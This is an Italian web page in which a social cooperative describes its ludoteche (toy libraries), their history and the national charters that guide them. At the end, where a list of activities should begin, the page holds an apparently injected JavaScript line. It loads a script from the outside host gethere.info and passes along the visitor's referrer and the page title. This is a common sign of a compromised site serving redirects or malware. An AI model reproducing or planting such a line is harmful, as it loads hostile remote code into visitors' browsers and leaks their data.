Ludoteca

Il servizio di Ludoteca può avere diverse declinazioni, distinguendosi in base all’utenza di riferimento o al luogo in cui sorge:

La ludoteca in Italia conta già oltrevent’anni di esperienza; è nata sulla base di un profilo generale condiviso e si è via via declinata nelle diverse realtà definendo caratteri specifici, rispondendo a domande particolari del territorio, strutturandosi sul piano istituzionale e organizzativo secondo diverse tipologie.

Si può leggere in questo un segnale abbastanza chiaro: la ludoteca è un’istituzione che non appartiene ad una moda temporanea, ma rappresenta un’opportunità interessante fra i servizi educativi e culturali del territorio, un luogo che si pone nel territorio come “un presidio del gioco”, offrendo risorse in fatto di spazi, materiali, opportunità ludiche e operatori competenti.

Le ludoteche gestite dalla nostra cooperativa si ispirano alla CARTA NAZIONALE DELLE LUDOTECHE ITALIANE e alla CARTA DELLE LUDOTECHE DI ALI PER GIOCARE, che abbiamo contribuito a scivere e che cerchiamo di promuovere presso tutti gli enti pubblici e gli addetti ai lavori del panorama ludico-educativo nazionale.

La particolarità della ludoteca, ciò da cui la sua definizione non può prescindere, è l’attenzione assoluta dedicata al gioco e al giocattolo e alla libertà del bambino nella scelta degli spazi, dei tempi e dei compagni di gioco.

Il destinatario principale è il bambino, il quale si sente coinvolto in un processo continuo di ricerca interiore, secondo modalità basate sullo scambio con gli altri.

Ogni ludoteca ha una storia propria, strettamente legata alle vicende e alla cultura del territorio, anche se tutte hanno delle caratteristiche comuni.

Le attività principali che in essa si svolgono si articolano principalmente in:

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;